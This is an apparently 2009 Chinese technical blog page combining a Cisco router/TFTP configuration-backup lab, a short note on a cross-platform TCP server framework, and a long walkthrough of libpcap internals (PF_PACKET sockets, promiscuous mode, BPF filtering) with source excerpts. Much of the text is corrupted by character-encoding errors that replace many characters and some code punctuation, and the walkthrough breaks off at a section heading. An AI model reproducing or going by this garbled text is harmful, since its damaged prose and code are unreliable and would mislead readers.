本实验将�?Cisco 路由器上配置常用讄��Q�将配置保存�?TFTP 服务器，然后�?TFTP 服务器恢复配�|��?/div>
��d�� 1�Q�配�|?ROUTER1
步骤 1�Q�ROUTER1 的基本配�|?br /> 使用实验开头的表格配置路由器主机名。配�|?FastEthernet 接口及其说明。以 cisco 为口令，保护�Ҏ��制台端口的访问。��用加密的使能口��o class 配置路由器。��用口�?cisco 限制对�\由器的远�E�访问。配�|�标语，警告此处��止未经授权的�h员访问。在路由器上执行 show running-config 命��o验证路由器的配置。如果配�|�不正确�Q�修正�Q何配�|�错误，然后重试。将配置保存�?NVRAM 中�?
在此��d��l�束�Ӟ��完成率应�?62%�?

��d�� 2�Q�配�|?TFTP 服务�?
步骤 1�Q�配�|?TFTP 服务�?br /> 使用以下信息��第 3 层地址和默认网兛_��用到 TFTP 服务器：
IP 地址�Q?92.168.1.2
子网掩码�Q?55.255.255.0
默认�|�关�Q?92.168.1.1
步骤 2�Q�验证连通�?br /> �?ROUTER1 Ping TFTP 服务器。如�?ping ��p�|�Q�请��?TFTP 和�\由器配置以解决问题�?br /> 在此��d��l�束�Ӟ��完成率应�?100%�?/div>
��d�� 3�Q�备份启动配�|�到 TFTP 服务�?br /> 步骤 1�Q�复刉��|?br /> �?ROUTER1 上��?Copy Start TFTP 命��o。输�?TFTP IP 地址作�ؓ�q�程��L��的地址�Q�保留所有其它问题�ؓ默认��|��?Enter�Q?br /> 在此��d��l�束�Ӟ��完成率应�?100%�?

��d�� 4�Q�验证配�|�传输到 TFTP 服务�?br /> 步骤 1�Q�验�?TFTP 传输
先单�?TFTP 服务器。接着单击 Config�Q�配�|�）选项卡。然后单�?TFTP 选项卡。确认列��Z�� ROUTER1-config 文�g�Q�应位于列表底部�Q?br /> 在此��d��l�束�Ӟ��完成率应�?100%�?nbsp;

摘自�Q�http://blog.163.com/qiaopengzhe/

矛_��@ 2009-08-12 09:39 发表评论

一个Tcp�|�络服务框架例子

矛_��@ — Mon, 27 Jul 2009 14:09:00 GMT
     摘要: 用Windows的IOCP、Linux的epoll、FreeBSD的kqueue写了一个支持高�q�发、多CPU、跨�q�_��的TCP�|�络服务框架�?��试下蝲netfrm.v2.rar�Q�解压羃得到netfrm.v2目录�Q�里面有netfrm.v2.vcproj和src目录�?��试代码在src/main.cpp�? ...  阅读全文

矛_��@ 2009-07-27 22:09 发表评论

libpcap �E�序框架

矛_��@ — Thu, 09 Jul 2009 14:01:00 GMT
首先说明一下包捕获机制�Q?br />
包捕��h��?/font>

从广义的角度上看�Q�一个包捕获机制包含三个主要部分�Q�最底层是针对特定操作系�l�的包捕��h��Ӟ��最高层是针对用��L��序的接口�Q�第三部分是包过滤机制�?/p>
不同的操作系�l�实现的底层包捕��h��制可能是不一��L��Q�但从�Ş式上看大同小异。数据包常规的传输�\径依�ơ�ؓ�|�卡、设备驱动层、数据链路层、IP 层、传输层、最后到辑ֺ�用程序。而包捕获机制是在数据链�\层增加一个旁路处理，对发送和接收到的数据包做�q��o/�~�冲�{�相兛_��理，最后直接传递到应用�E�序。值得注意的是�Q�包捕获机制�q�不影响操作�pȝ��Ҏ��据包的网�l�栈处理。对用户�E�序而言�Q�包捕获机制提供了一个统一的接口，使用��L��序只需要简单的调用若干函数��p��获得所期望的数据包。这样一来，针对特定操作�pȝ��的捕��h��制对用户透明�Q��用户�E�序有比较好的可�U�L��性。包�q��o机制是对所捕获到的数据包根据用��L��要求�q�行�{�选，最�l�只把满��滤条件的数据包传递给用户�E�序�?br />
libpcap 应用�E�序的框�Ӟ��

Libpcap 提供了系�l�独立的用户�U�别�|�络数据包捕��h��口，�q�充分考虑到应用程序的可移植性。Libpcap 可以在绝大多数类 unix �q�_��下工作，参考资�?A 中是对基�?libpcap 的网�l�应用程序的一个详�l�列表。在 windows �q�_��下，一个与libpcap 很类似的函数�?winpcap 提供捕获功能�Q�其官方�|�站�?a >http://winpcap.polito.it/�?/p>
Libpcap 软�g包可�?http://www.tcpdump.org/ 下蝲�Q�然后依此执行下列三条命令即可安装，但如果希�?libpcap 能在 linux 上正常工作，则必��M��内核支持"packet"协议�Q�也卛_��~�译内核时打开配置选项 CONFIG_PACKET(选项�~�省为打开)�?/p>

libpcap 源代码由 20 多个 C 文�g构成�Q�但�?Linux �pȝ��下�ƈ不是所有文仉��用到。可以通过查看命��o make 的输��Z��解实际所用的文�g。本文所针对的libpcap 版本号�ؓ 0.8.3�Q�网�l�类型�ؓ常规以太�|�。Libpcap 应用�E�序从�Ş式上看很��单，下面是一个简单的�E�序框架�Q?/p>

char * device; /* 用来捕获数据包的�|�络接口的名�U?*/ pcap_t * p; /* 捕获数据包句柄，最重要的数据结�?*/ struct bpf_program fcode; /* BPF �q��o代码�l�构 */ /* �W�一步：查找可以捕获数据包的讑֤� */ device = pcap_lookupdev(errbuf)�Q? /* �W�二步：创徏捕获句柄�Q�准备进行捕�?*/ p = pcap_open_live(device, 8000, 1, 500, errbuf)�Q? /* �W�三步：如果用户讄��了过滤条�Ӟ��则编译和安装�q��o代码 */ pcap_compile(p, &fcode, filter_string, 0, netmask)�Q? pcap_setfilter(p, &fcode)�Q? /* �W�四步：�q�入�Q�死�Q��@环，反复捕获数据�?*/ for( ; ; ) { while((ptr = (char *)(pcap_next(p, &hdr))) == NULL); /* �W�五步：�Ҏ��L��数据�q�行�c�d��转换�Q��{化成以太数据包类�?*/ eth = (struct libnet_ethernet_hdr *)ptr; /* �W�六步：对以太头部进行分析，判断所包含的数据包�c�d��Q�做�q�一步的处理 */ if(eth->ether_type == ntohs(ETHERTYPE_IP)) ………… if(eth->ether_type == ntohs(ETHERTYPE_ARP)) ………… } /* 最后一步：关闭捕获句柄,一个简单技巧是在程序初始化时增加信号处理函敎ͼ� 以便在程序退出前执行本条代码 */ pcap_close(p)�Q?

��查网�l�设�?/font>

libpcap �E�序的第一步通常是在�pȝ��中找到合适的�|�络接口讑֤�。网�l�接口在Linux �|�络体系中是一个很重要的概念，它是对具体网�l�硬件设备的一个抽象，在它的下面是具体的网卡驱动程序，而其上则是网�l�协议层。Linux 中最常见的接口设备名 eth0 �?lo。Lo �U�Cؓ回�\讑֤��Q�是一�U�逻辑意义上的讑֤�,其主要目的是��Z��调试�|�络�E�序之间的通讯功能。eth0 对应了实际的物理�|�卡�Q�在真实�|�络环境下，数据包的发送和接收都要通过 eht0。如果计��机有多个网卡，则还可以有更多的�|�络接口�Q�如 eth1,eth2 �{�等。调用命�?ifconfig 可以列出当前所有活跃的接口及相关信息，注意�?eth0 的描�q�C��既有物理�|�卡�?MAC 地址�Q�也有网�l�协议的 IP 地址。查看文�?/proc/net/dev 也可获得接口信息�?/p>
Libpcap 中检查网�l�设备中主要使用到的函数关系如下图：

libpcap 调用 pcap_lookupdev() 函数获得可用�|�络接口的设备名。首先利用函�?getifaddrs() 获得所有网�l�接口的地址�Q�以及对应的�|�络掩码、广播地址、目标地址�{�相关信息，再利�?add_addr_to_iflist()、add_or_find_if()、get_instance() 把网�l�接口的信息增加到结构链�?pcap_if 中，最后从链表中提取第一个接口作为捕莯��备。其�?get_instanced() 的功能是从设备名开�?扄��一个是数字的字�W?做�ؓ接口的实例号。网�l�接口的讑֤�可��，则排在链表的��前面，因此�Q�通常函数最后返回的讑֤�名�ؓ eth0。虽�?libpcap 可以工作在回路接口上�Q�但昄�� libpcap 开发者认为捕��h��E�之间的数据包没有多大意义。在��查网�l�设备操作中�Q�主要用到的数据�l�构和代码如下：

/* libpcap 自定义的接口信息链表 [pcap.h] */ struct pcap_if { struct pcap_if *next; char *name; /* 接口讑֤��?*/ char *description; /* 接口描述 */ /*接口�?IP 地址, 地址掩码, �q�播地址,目的地址 */ struct pcap_addr addresses; bpf_u_int32 flags; /* 接口的参�?*/ }; char * pcap_lookupdev(register char * errbuf) { pcap_if_t *alldevs; …… pcap_findalldevs(&alldevs, errbuf)�Q? …… strlcpy(device, alldevs->name, sizeof(device)); }

回页�?/u>

打开�|�络讑֤�

当设备找到后�Q�下一步工作就是打开讑֤�以准备捕��h��据包。Libpcap 的包捕获是徏立在具体的操作系�l�所提供的捕��h��制上�Q��?Linux �pȝ��随着版本的不同，所支持的捕��h��制也有所不同�?/p>
2.0 及以前的内核版本使用一个特�D�的 socket �c�d�� SOCK_PACKET�Q�调用�Ş式是 socket(PF_INET, SOCK_PACKET, int protocol)�Q�但 Linux 内核开发者明��指��U�方式已�q�时。Linux �?2.2 及以后的版本中提供了一�U�新的协议簇 PF_PACKET 来实现捕��h��制。PF_PACKET 的调用�Ş式�ؓ socket(PF_PACKET, int socket_type, int protocol)�Q�其�?socket �c�d��可以�?SOCK_RAW �?SOCK_DGRAM。SOCK_RAW �c�d��使得数据包从数据链�\层取得后�Q�不做�Q何修改直接传递给用户�E�序�Q��?SOCK_DRRAM 则要�Ҏ��据包�q�行加工(cooked)�Q�把数据包的数据链�\层头部去掉，而��用一个通用�l�构 sockaddr_ll 来保存链路信息�?/p>
使用 2.0 版本内核捕获数据包存在多个问题：首先�Q�SOCK_PACKET 方式使用�l�构 sockaddr_pkt 来保存数据链路层信息�Q�但该结构缺乏包�c�d��信息�Q�其�ơ，如果参数 MSG_TRUNC 传递给��d��函数 recvmsg()、recv()、recvfrom() �{�，则函数返回的数据包长度是实际��d��的包数据长度�Q�而不是数据包真正的长度。Libpcap 的开发者在源代码中明确��不��?2.0 版本�q�行捕获�?/p>
相对 2.0 版本 SOCK_PACKET 方式�Q?.2 版本�?PF_PACKET 方式则不存在上述两个问题。在实际应用中，用户�E�序昄��希望直接得到"原始"的数据包�Q�因此��?SOCK_RAW �c�d��最好。但在下面两�U�情况下�Q�libpcap 不得不��?SOCK_DGRAM �c�d��Q�从而也必须为数据包合成一�?�?链�\层头部（sockaddr_ll�Q��?/p>

某些�c�d��的设备数据链路层头部不可用：例如 Linux 内核�?PPP 协议实现代码�?PPP 数据包头部的支持不可靠�?
在捕莯��备�ؓ"any"�Ӟ��所有设备意味着 libpcap �Ҏ��有接口进行捕��P��Z��使包�q��o机制能在所有类型的数据包上正常工作,要求所有的数据包有相同的数据链路头部�?

打开�|�络讑֤�的主函数�?pcap_open_live()[pcap-linux.c]�Q�其��d��是通过�l�定的接口设备名�Q�获得一个捕获句柄：�l�构 pcap_t。pcap_t 是大多数 libpcap 函数都要用到的参敎ͼ�其中最重要的属性则是上面讨论到的三�U?socket 方式中的某一�U�。首先我们看�?pcap_t 的具体构成�?/p>

struct pcap [pcap-int.h] { int fd; /* 文�g描述字，实际��是 socket */ /* �?socket 上，可以使用 select() �?poll() �{?I/O 复用�c�d��函数 */ int selectable_fd; int snapshot; /* 用户期望的捕��h��据包最大长�?*/ int linktype; /* 讑֤��c�d�� */ int tzoff; /* 时区位置�Q�实际上没有被��?*/ int offset; /* 边界寚w��偏移�?*/ int break_loop; /* 强制从读数据包��@环中跛_��的标�?*/ struct pcap_sf sf; /* 数据包保存到文�g的相关配�|�数据结�?*/ struct pcap_md md; /* 具体描述如下 */ int bufsize; /* �ȝ��冲区的长�?*/ u_char buffer; /* �ȝ��冲区指针 */ u_char *bp; int cc; u_char *pkt; /* 相关抽象操作的函数指针，最�l�指向特定操作系�l�的处理函数 */ int (*read_op)(pcap_t *, int cnt, pcap_handler, u_char *); int (*setfilter_op)(pcap_t *, struct bpf_program *); int (*set_datalink_op)(pcap_t *, int); int (*getnonblock_op)(pcap_t *, char *); int (*setnonblock_op)(pcap_t *, int, char *); int (*stats_op)(pcap_t *, struct pcap_stat *); void (*close_op)(pcap_t *); /*如果 BPF �q��o代码不能在内�怸�执行,则将其保存�ƈ在用��L��间执�?*/ struct bpf_program fcode; /* 函数调用出错信息�~�冲�?*/ char errbuf[PCAP_ERRBUF_SIZE + 1]; /* 当前讑֤�支持的、可更改的数据链路类型的个数 */ int dlt_count; /* 可更改的数据链�\�c�d��号链表，�?linux 下没有��?*/ int *dlt_list; /* 数据包自定义头部�Q�对数据包捕��h��间、捕获长度、真实长度进行描�q?[pcap.h] */ struct pcap_pkthdr pcap_header; }; /* 包含了捕获句柄的接口、状态、过滤信�? [pcap-int.h] */ struct pcap_md { /* 捕获状态结�? [pcap.h] */ struct pcap_stat stat; int use_bpf; /* 如果�?�Q�则代表使用内核�q��o*/ u_long TotPkts; u_long TotAccepted; /* 被接收数据包数目 */ u_long TotDrops; /* 被丢弃数据包数目 */ long TotMissed; /* 在过滤进行时被接口丢弃的数据包数�?*/ long OrigMissed; /*在过滤进行前被接口丢弃的数据包数�?/ #ifdef linux int sock_packet; /* 如果�?1�Q�则代表使用 2.0 内核�?SOCK_PACKET 模式 */ int timeout; /* pcap_open_live() 函数��时�q�回旉��*/ int clear_promisc; /* 关闭时设�|�接口�ؓ非�؜杂模�?*/ int cooked; /* 使用 SOCK_DGRAM �c�d�� */ int lo_ifindex; /* 回�\讑֤�索引�?*/ char *device; /* 接口讑֤�名称 */ /* 以�؜杂模式打开 SOCK_PACKET �c�d�� socket �?pcap_t 链表*/ struct pcap *next; #endif };

函数 pcap_open_live() 的调用�Ş式是 pcap_t * pcap_open_live(const char *device, int snaplen, int promisc, int to_ms, char *ebuf)�Q�其中如�?device �?NULL �?any"�Q�则�Ҏ��有接口捕��P��snaplen 代表用户期望的捕��h��据包最大长度，promisc 代表讄��接口为�؜杂模式（捕获所有到达接口的数据包，但只有在讑֤��l�定的情况下有意义）�Q�to_ms 代表函数��时�q�回的时间。本函数的代码比较简单，其执行步骤如下：

为结�?pcap_t 分配�I�间�q�根据函数入参对光��分属性进行初试化�?
分别利用函数 live_open_new() �?live_open_old() ��试创徏 PF_PACKET 方式�?SOCK_PACKET 方式�?socket�Q�注意函数名中一个�ؓ"new"�Q�另一个�ؓ"old"�?
�Ҏ�� socket 的方式，讄��捕获句柄的读�~�冲区长度，�q�分配空间�?
为捕获句�?pcap_t 讄�� linux �pȝ��下的特定函数�Q�其中最重要的是��L��据包函数和设�|�过滤器函数。（注意到这�U�从抽象模式到具体模式的设计思想�?linux 源代码中也多�ơ出玎ͼ��?VFS 文�g�pȝ��Q?br /> handle->read_op = pcap_read_linux�Q?handle->setfilter_op = pcap_setfilter_linux�Q?

下面我们依次分析 2.2 �?2.0 内核版本下的 socket 创徏函数�?/p>

static int live_open_new(pcap_t *handle, const char *device, int promisc, int to_ms, char *ebuf) { /* 如果讑֤��l�定,则打开一�?RAW �c�d��的套接字,否则,打开 DGRAM �c�d��的套接字 */ sock_fd = device ? socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)) : socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_ALL)); /* 取得回�\讑֤�接口的烦�?*/ handle->md.lo_ifindex = iface_get_id(sock_fd, "lo", ebuf); /* 如果讑֤��l�定�Q�但接口�c�d��未知或是某些必须工作在加工模式下的特定类型，则��用加工模�?*/ if (device) { /* 取得接口的硬件类�?*/ arptype = iface_get_arptype(sock_fd, device, ebuf); /* linux 使用 ARPHRD_xxx 标识接口的硬件类型，�?libpcap 使用DLT_xxx 来标识。本函数是对上述二者的做映��变换，讄��句柄的链路层�c�d��? DLT_xxx�Q��ƈ讄��句柄的偏�U�量为合适的��|��使其与链路层头部之和�?4 的倍数�Q�目的是边界寚w�� */ map_arphrd_to_dlt(handle, arptype, 1); /* 如果接口是前面谈到的不支持链路层头部的类型，则退而求其次�Q��?SOCK_DGRAM 模式 */ if (handle->linktype == xxx) { close(sock_fd)�Q? sock_fd = socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_ALL)); } /* 获得�l�定的设备名的烦�?*/ device_id = iface_get_id(sock_fd, device, ebuf); /* 把套接字和给定的讑֤��l�定�Q�意味着只从�l�定的设备上捕获数据�?*/ iface_bind(sock_fd, device_id, ebuf)�Q? } else { /* 现在是加工模�?*/ handle->md.cooked = 1; /* 数据包链路层头部为结�?sockaddr_ll�Q?SLL 大概是结构名�U�的��写�Ş�?*/ handle->linktype = DLT_LINUX_SLL; device_id = -1; } /* 讄��l�定讑֤�为�؜杂模�?*/ if (device && promisc) { memset(&mr, 0, sizeof(mr)); mr.mr_ifindex = device_id; mr.mr_type = PACKET_MR_PROMISC; setsockopt(sock_fd, SOL_PACKET, PACKET_ADD_MEMBERSHIP, &mr, sizeof(mr))�Q? } /* 最后把创徏�?socket 保存在句�?pcap_t �?*/ handle->fd = sock_fd; } /* 2.0 内核下函数要��单的多，因�ؓ只有唯一的一�U?socket 方式 */ static int live_open_old(pcap_t *handle, const char *device, int promisc, int to_ms, char *ebuf) { /* 首先创徏一个SOCK_PACKET�c�d��?socket */ handle->fd = socket(PF_INET, SOCK_PACKET, htons(ETH_P_ALL)); /* 2.0 内核下，不支持捕��h��有接口，讑֤�必须�l�定 */ if (!device) { strncpy(ebuf, "pcap_open_live: The \"any\" device isn't supported on 2.0[.x]-kernel systems", PCAP_ERRBUF_SIZE); break; } /* �?socket 和给定的讑֤��l�定 */ iface_bind_old(handle->fd, device, ebuf)�Q? /*以下的处理和 2.2 版本下的�怼��Q�有所区别的是如果接口链�\层类型未知，�?libpcap 直接退�?*/ arptype = iface_get_arptype(handle->fd, device, ebuf); map_arphrd_to_dlt(handle, arptype, 0); if (handle->linktype == -1) { snprintf(ebuf, PCAP_ERRBUF_SIZE, "unknown arptype %d", arptype); break; } /* 讄��l�定讑֤�为�؜杂模�?*/ if (promisc) { memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ioctl(handle->fd, SIOCGIFFLAGS, &ifr)�Q? ifr.ifr_flags |= IFF_PROMISC; ioctl(handle->fd, SIOCSIFFLAGS, &ifr)�Q? } }

比较上面两个函数的代码，�q�有两个�l�节上的区别。首先是 socket 与接口绑定所使用的结构：老式的绑定��用了�l�构 sockaddr�Q�而新式的则��用了 2.2 内核中定义的通用链�\头部层结�?sockaddr_ll�?/p>

iface_bind_old(int fd, const char *device, char *ebuf) { struct sockaddr saddr; memset(&saddr, 0, sizeof(saddr)); strncpy(saddr.sa_data, device, sizeof(saddr.sa_data)); bind(fd, &saddr, sizeof(saddr))�Q? } iface_bind(int fd, int ifindex, char *ebuf) { struct sockaddr_ll sll; memset(&sll, 0, sizeof(sll)); sll.sll_family = AF_PACKET; sll.sll_ifindex = ifindex; sll.sll_protocol = htons(ETH_P_ALL); bind(fd, (struct sockaddr *) &sll, sizeof(sll)�Q? }

�W�二个是�?2.2 版本中设�|�设备�ؓ��h��模式�Ӟ��使用了函�?setsockopt()�Q�以及新的标�?PACKET_ADD_MEMBERSHIP 和结�?packet_mreq。我估计�q�种方式主要是希望提供一个统一的调用接口，以代替传�l�的�Q��؜��q��Q�ioctl 调用�?/p>

struct packet_mreq { int mr_ifindex; /* 接口索引�?*/ unsigned short mr_type; /* 要执行的操作(�? */ unsigned short mr_alen; /* 地址长度 */ unsigned char mr_address[8]; /* 物理层地址 */ };

用户应用�E�序接口

Libpcap 提供的用��L��序接口比较简单，通过反复调用函数pcap_next()[pcap.c] 则可获得捕获到的数据包。下面是一些��用到的数据结构：

/* 单个数据包结构，包含数据包元信息和数据信�?*/ struct singleton [pcap.c] { struct pcap_pkthdr hdr; /* libpcap 自定义数据包头部 */ const u_char * pkt; /* 指向捕获到的�|�络数据 */ }; /* 自定义头部在把数据包保存到文件中也被使用 */ struct pcap_pkthdr { struct timeval ts; /* 捕获旉��?*/ bpf_u_int32 caplen; /* 捕获到数据包的长�?*/ bpf_u_int32 len; /* 数据包的真正长度 */ } /* 函数 pcap_next() 实际上是对函�?pcap_dispatch()[pcap.c] 的一个包�?*/ const u_char * pcap_next(pcap_t *p, struct pcap_pkthdr *h) { struct singleton s; s.hdr = h; /*入参"1"代表收到1个数据包��p��回；回调函数 pcap_oneshot() 是对�l�构 singleton 的属性赋�?*/ if (pcap_dispatch(p, 1, pcap_oneshot, (u_char*)&s) <= 0) return (0); return (s.pkt); /* �q�回数据包缓冲区的指�?*/ }

pcap_dispatch() ��单的调用捕获句柄 pcap_t 中定义的特定操作�pȝ��的读数据函数�Q�return p->read_op(p, cnt, callback, user)。在 linux �pȝ��下，对应的读函数�?pcap_read_linux()�Q�在创徏捕获句柄时已定义 [pcap-linux.c]�Q�，而pcap_read_linux() 则是直接调用 pcap_read_packet()([pcap-linux.c])�?/p>
pcap_read_packet() 的中心�Q务是利用�?recvfrom() 从已创徏�?socket 上读数据包数据，但是考虑�?socket 可能为前面讨论到的三�U�方式中的某一�U�，因此�Ҏ��据缓冲区的结构有相应的处理，主要表现在加工模式下对伪链�\层头部的合成。具体代码分析如下：

static int pcap_read_packet(pcap_t *handle, pcap_handler callback, u_char *userdata) { /* 数据包缓冲区指针 */ u_char * bp; /* bp 与捕获句�?pcap_t �?handle->buffer 之间的偏�U�量�Q�其目的是�ؓ在加工模式捕��h��况下�Q��ؓ合成的伪数据链�\层头部留出空�?*/ int offset; /* PACKET_SOCKET 方式下，recvfrom() �q�回 scokaddr_ll �c�d��Q�而在SOCK_PACKET 方式下， �q�回 sockaddr �c�d�� */ #ifdef HAVE_PF_PACKET_SOCKETS struct sockaddr_ll from; struct sll_header * hdrp; #else struct sockaddr from; #endif socklen_t fromlen; int packet_len, caplen; /* libpcap 自定义的头部 */ struct pcap_pkthdr pcap_header; #ifdef HAVE_PF_PACKET_SOCKETS /* 如果是加工模式，则�ؓ合成的链路层头部留出�I�间 */ if (handle->md.cooked) offset = SLL_HDR_LEN; /* 其它两中方式下，链�\层头部不做修改的被返回，不需要留�I�间 */ else offset = 0; #else offset = 0; #endif bp = handle->buffer + handle->offset; /* 从内�怸�接收一个数据包�Q�注意函数入参中�?bp 的位�|�进行修�?*/ packet_len = recvfrom( handle->fd, bp + offset, handle->bufsize - offset, MSG_TRUNC, (struct sockaddr *) &from, &fromlen); #ifdef HAVE_PF_PACKET_SOCKETS /* 如果是回路设�?则只捕获接收的数据包�Q�而拒�l�发送的数据包。显�Ӟ��我们只能�?PF_PACKET 方式下这样做,因�ؓ SOCK_PACKET 方式下返回的链�\层地址�c�d��? sockaddr_pkt�Q�缺��了判断数据包类型的信息�?/ if (!handle->md.sock_packet && from.sll_ifindex == handle->md.lo_ifindex && from.sll_pkttype == PACKET_OUTGOING) return 0; #endif #ifdef HAVE_PF_PACKET_SOCKETS /* 如果是加工模式，则合成伪链�\层头�?*/ if (handle->md.cooked) { /* 首先修正捕包数据的长度，加上链�\层头部的长度 */ packet_len += SLL_HDR_LEN; hdrp = (struct sll_header *)bp; /* 以下的代码分别对伪链路层头部的数据赋�?*/ hdrp->sll_pkttype = xxx; hdrp->sll_hatype = htons(from.sll_hatype); hdrp->sll_halen = htons(from.sll_halen); memcpy(hdrp->sll_addr, from.sll_addr, (from.sll_halen > SLL_ADDRLEN) ? SLL_ADDRLEN : from.sll_halen); hdrp->sll_protocol = from.sll_protocol; } #endif /* 修正捕获的数据包的长度，�Ҏ��前面的讨论，SOCK_PACKET 方式下长度可能是不准��的 */ caplen = packet_len; if (caplen > handle->snapshot) caplen = handle->snapshot; /* 如果没有使用内核�U�的包过�?则在用户�I�间�q�行�q��o*/ if (!handle->md.use_bpf && handle->fcode.bf_insns) { if (bpf_filter(handle->fcode.bf_insns, bp, packet_len, caplen) == 0) { /* 没有通过�q��o�Q�数据包被丢�?*/ return 0; } } /* 填充 libpcap 自定义数据包头部数据�Q�捕��h��?捕获的长�?真实的长�?*/ ioctl(handle->fd, SIOCGSTAMP, &pcap_header.ts)�Q? pcap_header.caplen = caplen; pcap_header.len = packet_len; /* 累加捕获数据包数目，注意到在不同内核/捕获方式情况下数目可能不准确 */ handle->md.stat.ps_recv++; /* 调用用户定义的回调函�?*/ callback(userdata, &pcap_header, bp); }

数据包过滤机�?/font>

大量的网�l�监控程序目的不同，期望的数据包�c�d��也不同，但绝大多数情况都都只需要所有数据包的一�Q�小�Q�部分。例如：寚w��件系�l�进行监控可能只需要端口号�?25�Q�smtp�Q�和 110�Q�pop3) �?TCP 数据包，�?DNS �pȝ��q�行监控��只需要端口号�?53 �?UDP 数据包。包�q��o机制的引入就是�ؓ了解决上�q�问题，用户�E�序只需��单的讄��一�p�d��q��o条�g�Q�最�l�便能获得满��x��件的数据包。包�q��o操作可以在用��L��间执行，也可以在内核�I�间执行�Q�但必须注意到数据包从内核空间拷贝到用户�I�间的开销很大�Q�所以如果能在内核空间进行过滤，会极大的提高捕获的效率。内核过滤的优势在低速网�l�下表现不明显，但在高速网�l�下是非常突出的。在理论研究和实际应用中�Q�包捕获和包�q��o从语意上�q�没有严格的区分�Q�关键在于认识到捕获数据包必然有�q��o操作。基本上可以认�ؓ�Q�包�q��o机制在包捕获机制中占中心��C��?/p>
包过滤机制实际上是针�Ҏ��据包的布��值操作函敎ͼ�如果函数最�l�返�?true�Q�则通过�q��o�Q�反之则被丢弃。�Ş式上包过滤由一个或多个谓词判断的�ƈ操作�Q�AND�Q�和或操作（OR�Q�构成，每一个谓词判断基本上对应了数据包的协议类型或某个特定�?例如�Q�只需�?TCP �c�d��且端口�ؓ 110 的数据包�?ARP �c�d��的数据包。包�q��o机制在具体的实现上与数据包的协议�c�d��q�无多少关系�Q�它只是把数据包��单的看成一个字节数�l�，而谓词判断会�Ҏ��具体的协议映��到数组特定位置的倹{��如判断ARP�c�d��数据包，只需要判断数�l�中�W?13�?4 个字节（以太头中的数据包�c�d��Q�是否�ؓ 0X0806。从理论研究的意思上看，包过滤机制是一个数学问题，或者说是一个算法问题，其中心�Q务是如何使用最��的判断操作、最��的旉��完成�q��o处理�Q�提高过滤效率�?/p>

BPF

Libpcap 重点使用 BPF�Q�BSD Packet Filter�Q�包�q��o机制�Q�BPF �?1992 �q�被设计出来�Q�其设计目的主要是解军_��时已存在的过滤机制效率低下的问题。BPF的工作步骤如下：当一个数据包到达�|�络接口�Ӟ��数据链�\层的驱动会把它向�pȝ��的协议栈传送。但如果 BPF 监听接口�Q�驱动首先调�?BPF。BPF 首先�q�行�q��o操作�Q�然后把数据包存攑֜��q��o器相关的�~�冲��Z��Q�最后设备驱动再�ơ获得控制。注意到BPF是先�Ҏ��据包�q��o再缓�Ԍ��避免了类�?sun �?NIT �q��o机制先缓冲每个数据包直到用户��L��据时再过滤所造成的效率问题。参考资料D是关�?BPF 设计思想最重要的文献�?/p>
BPF 的设计思想和当时的计算机硬件的发展有很大联�p�，相对老式的过滤方式CSPF�Q�CMU/Stanford Packet Filter�Q�它有两大特炏V�?�Q�基于寄存器的过滤机�Ӟ��而不是早期内存堆栈过滤机�Ӟ��2�Q�直接��用独立的、非�׃�n的内存缓冲区。同�Ӟ��BPF 在过滤算法是也有很大�q�步�Q�它使用无环控制��图�Q�CFG control flow graph�Q?而不是老式的布��表辑ּ�树（boolean expression tree�Q�。布��表辑ּ�树理解上比较直观�Q�它的每一个叶子节点即是一个谓词判断，而非叶子节点则�ؓ AND 操作�?OR操作。CSPF 有三个主要的�~�点�?�Q�过滤操作��用的栈在内存中被模拟�Q�维护栈指针需要��用若�q�的�?减等操作�Q�而内存操作是��C��计算机架构的主要瓉��?�Q�布��表辑ּ�树造成了不需要的重复计算�?�Q�不能分析数据包的变长头部。BPF 使用的CFG ��法实际上是一�U�特�D�的状态机�Q�每一节点代表了一个谓词判断，而左双��分别对应了判断失败和成功后的跌��{�Q�蟩转后又是谓词判断�Q�这样反复操作，直到到达成功或失败的�l�点。CFG ��法的优点在于把�Ҏ��据包的分析信息直接徏立在图中�Q�从而不需要重复计��。直观的看，CFG 是一�U?快速的、一直向�?的算法�?/p>

�q��o代码的编�?/font>

BPF �?CFG ��法的代码实现非常复杂，它��用伪机器方式。BPF 伪机器是一个轻量��的，高效的状态机�Q�对 BPF �q��o代码�q�行解释处理。BPF �q��o代码形式�?opcode jt jf k"�Q�分别代表了操作码和��d��方式、判断正��的跌��{、判断失败的跌��{、操作��用的通用数据域。BPF �q��o代码从逻辑上看很类��g��汇编语言�Q�但它实际上是机器语�a��Q�注意到上述 4 个域的数据类型都�?int �?char 型。显�Ӟ��q��h��写过滤代码太�q�复杂，因此 libpcap 允许用户书写高层的、容易理解的�q��o字符�Ԍ��然后��其�~�译为BPF代码�?/p>
Libpcap 使用�?4 个源�E�序 gencode.c、optimize.c、grammar.c、scanner.c完成�~�译操作�Q�其中前两个实现了对�q��o字符串的�~�译和优化，后两个主要是为编译提供从协议相关�q��o条�g到协议无�?的字�W�数�l?位置信息的映��，�q�且它们��p��汇分析器生成�?flex �?bison 生成。参考资�?C 有对此两个工��L��讲解�?/p>

flex -Ppcap_ -t scanner.l > $.scanner.c; mv $.scanner.c scanner.c bison -y -p pcap_ -d grammar.y mv y.tab.c grammar.c mv y.tab.h tokdefs.h

�~�译�q��o字符串调用了函数 pcap_compile()[getcode.c]�Q��Ş式�ؓ�Q?/p>

int pcap_compile(pcap_t *p, struct bpf_program *program, char *buf, int optimize, bpf_u_int32 mask)

其中 buf 指向用户�q��o字符�Ԍ��~�译后的 BPF 代码存在在结�?bpf_program中，标志 optimize 指示是否�?BPF 代码�q�行优化�?/p>

/* [pcap-bpf.h] */ struct bpf_program { u_int bf_len; /* BPF 代码中谓词判断指令的数目 */ struct bpf_insn *bf_insns; /* �W�一个谓词判断指�?*/ }; /* 谓词判断指��o�l�构�Q�含意在前面已描�q?[pcap-bpf.h] */ struct bpf_insn { u_short code; u_char jt; u_char jf; bpf_int32 k; };

�q��o代码的安�?/font>

